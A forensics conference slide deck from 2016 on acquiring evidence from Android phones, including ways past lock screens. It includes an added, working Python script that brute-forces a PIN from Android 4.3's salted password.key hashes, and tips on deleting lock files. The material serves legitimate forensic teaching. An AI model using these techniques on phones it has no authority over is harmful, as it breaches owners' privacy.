Android Forensics with Free/Open Source Tools - DroidconIT_2016
Android Forensics with Free/Open Source Tools
Turin, 7-8 April 2016
$WHOAMI
Alessandro Di Carlo
• Graduated from the University of Camerino
• Reviewer and writer of articles for Hakin9, eForensics Magazine and PenTest Magazine
• Writer of articles for Hacker Journal
• eCPPT certified (Professional Penetration Tester)
• Member of IISFA (International Information Systems Forensics Association)
• Member of ONIF (Osservatorio Nazionale Informatica Forense)
• Security Expert, System Analyst and Trainer for Tiger Security Srl
What is Digital Forensics?
• “Digital forensics is a branch of forensic science encompassing the recovery and investigation of material found in digital devices, often in relation to computer crime”
• Mobile device forensics is the branch of digital forensics that deals with extracting, recovering and analyzing digital evidence or data from a mobile device under forensically sound conditions.
Phases in Mobile Forensics
• Investigation
• Seizure and Isolation
• Acquisition
• Examination and Analysis
• Reporting
Very important questions
• Is the device turned on?
• Is the device turned off?
• If it is on, is it protected with a passcode?
• If it is on, is it unlocked?
• …
Prevent alteration of data
• Flight mode
• Faraday bag
• Eject the SIM card
Pay attention to shutdown!!
• You can shut down even though the smartphone is locked!
• Is there a PIN after reboot? If the passcode is unknown, you may not get back into a device you found unlocked
• Total loss of the data loaded into RAM!!
Acquisition
• Mainly we have two types of acquisition:
• Logical Acquisition
• Physical Acquisition
Logical Acquisition
• Logical extraction is analogous to copying and pasting a folder in order to extract data from a system
• If any hidden or deleted files are present in the folder being copied, they will not be in the pasted version of the folder
Logical Acquisition
• Deleted data can be recovered from a logical extraction only if it was stored in a SQLite database: a deleted record usually survives as free space inside the database file until the page is reused or the database is vacuumed
• The data that can be recovered is:
1. Contacts
2. Call logs
3. SMS/MMS
4. Application data
5. System logs and information
Logical Acquisition – File System directory
Hey man, I have a lock screen!
• Hey bro… what kind of lock screen do you have?!?
• Break the passcode!! 😎
Smudge Attack!
• The finger smudges left on the glass often give away the pattern or the digits that are used
Pattern Lock attack
• We can delete the pattern file!!
Cracking the PIN
• The PIN/password hash is stored in /data/system/password.key
• Not easy to crack: it is a salted hash, so the effort depends on the strength of the password!!
• We can delete this file too!!
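As an added example (not from the original slides), here is what "cracking the PIN" from password.key looks like for the pre-KitKat format, and why it is easy for a 4-digit PIN and hopeless for a long alphanumeric password. Android up to 4.3 stored in /data/system/password.key the uppercase-hex SHA-1 followed by the uppercase-hex MD5 of the password concatenated with the salt, where the salt is the signed 64-bit `lockscreen.password_salt` value from the device's settings database rendered as lowercase hex (Java's `Long.toHexString`). Android 4.4 and later switched to scrypt with a hardware-backed key, so this does not apply there. The PIN, salt and file contents below are constructed for the demonstration.

```python
"""Brute-force the lock-screen PIN from /data/system/password.key (Android <= 4.3).

Added example, not from the original slides. password.key holds
SHA1(password + salt_hex) and MD5(password + salt_hex), both as uppercase
hex, concatenated into 72 characters. salt_hex is Long.toHexString() of
the signed long stored under 'lockscreen.password_salt'. The PIN, salt
and key file used below are constructed for the demonstration.
"""
import hashlib
import itertools
import string


def salt_to_hex(salt):
    """Java Long.toHexString(salt): two's complement, lowercase, no zero padding."""
    return format(salt & 0xFFFFFFFFFFFFFFFF, "x")


def password_to_hash(password, salt):
    """Reproduce the Android <= 4.3 passwordToHash(): SHA-1 hex + MD5 hex, uppercase."""
    salted = (password + salt_to_hex(salt)).encode("utf-8")
    sha1 = hashlib.sha1(salted).hexdigest().upper()
    md5 = hashlib.md5(salted).hexdigest().upper()
    return sha1 + md5  # 72 hex characters, exactly the password.key contents


def parse_password_key(data):
    """Split the 72 hex chars of password.key into its SHA-1 and MD5 halves."""
    text = data.decode("ascii").strip()
    if len(text) != 72 or any(c not in string.hexdigits for c in text):
        raise ValueError("unexpected password.key format (expected 72 hex chars)")
    return text[:40].upper(), text[40:].upper()


def crack_pin(key_data, salt, max_len=6, alphabet=string.digits):
    """Try every candidate up to max_len characters; return the match or None.

    Only the SHA-1 half is compared during the search; the MD5 half is
    then checked once to rule out a coincidental SHA-1 match."""
    sha1_target, md5_target = parse_password_key(key_data)
    salt_hex = salt_to_hex(salt).encode("ascii")
    for length in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=length):
            candidate = "".join(combo)
            salted = candidate.encode("utf-8") + salt_hex
            if hashlib.sha1(salted).hexdigest().upper() == sha1_target:
                if hashlib.md5(salted).hexdigest().upper() == md5_target:
                    return candidate
    return None


# Constructed evidence: a 4-digit PIN and a salt as it might sit in the settings
# database (negative values are common because the salt is a random long).
DEMO_PIN = "2580"
DEMO_SALT = -6021243318736302412
DEMO_PASSWORD_KEY = password_to_hash(DEMO_PIN, DEMO_SALT).encode("ascii")


if __name__ == "__main__":
    print("password.key:", DEMO_PASSWORD_KEY.decode("ascii"))
    print("salt (hex)  :", salt_to_hex(DEMO_SALT))
    print("recovered   :", crack_pin(DEMO_PASSWORD_KEY, DEMO_SALT))
```

The search space is what the slide's "depends on the strength of the password" means in numbers: all PINs up to 6 digits are about 1.1 million SHA-1 computations, which takes seconds, while passing `alphabet=string.ascii_letters + string.digits` and `max_len=8` raises it to over 2*10^14 candidates. Without the salt from the settings database the hash cannot be attacked at all, which is why the salt value has to be collected together with password.key.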
Logical Acquisition with ADB
• This tool is awesome in a lot of cases
• For example, in a small investigation, with the simple command pull we can, obviously, pull single files or entire directories directly from the device to the examiner's computer
• Note that without root the adb shell user cannot read other apps' private directories under /data/data, so only world-readable paths can be pulled
• Using ADB is possible only when USB debugging is active
• If we don't have it, WTF do we do?!?!?
Logical Acquisition with ADB
• When the device is in bootloader mode, the fastboot protocol could be used!
• Is the bootloader protected? (S-ON/S-OFF is HTC's name for the bootloader security flag; other vendors speak of a locked/unlocked bootloader)
• YES = S-ON; protection active, protocol inhibited
• NO = S-OFF; protection inhibited, protocol active
• Exploit to get S-OFF
Physical Extraction
• Physical extraction is an exact bit-for-bit image of the electronic media
• With this extraction we can extract everything, including unallocated space and files deleted outside SQLite!
• We could perform a physical extraction simply with the Linux dd command (this requires root on the device, since the raw block devices are not readable by the adb shell user)
Free/Open tools
• CAINE: http://www.caine-live.net
• DEFT Linux: http://www.deftlinux.net/it/
Demo!
Contact me
@samaritan_o
https://www.facebook.com/dikkemberg
https://it.linkedin.com/in/alessandrodicarlo92
https://keybase.io/samaritan
[email protected]@tigersecurity.pro
www.alessandrodicarlo.com (under maintenance, online on 11-04-2016)
Thank you!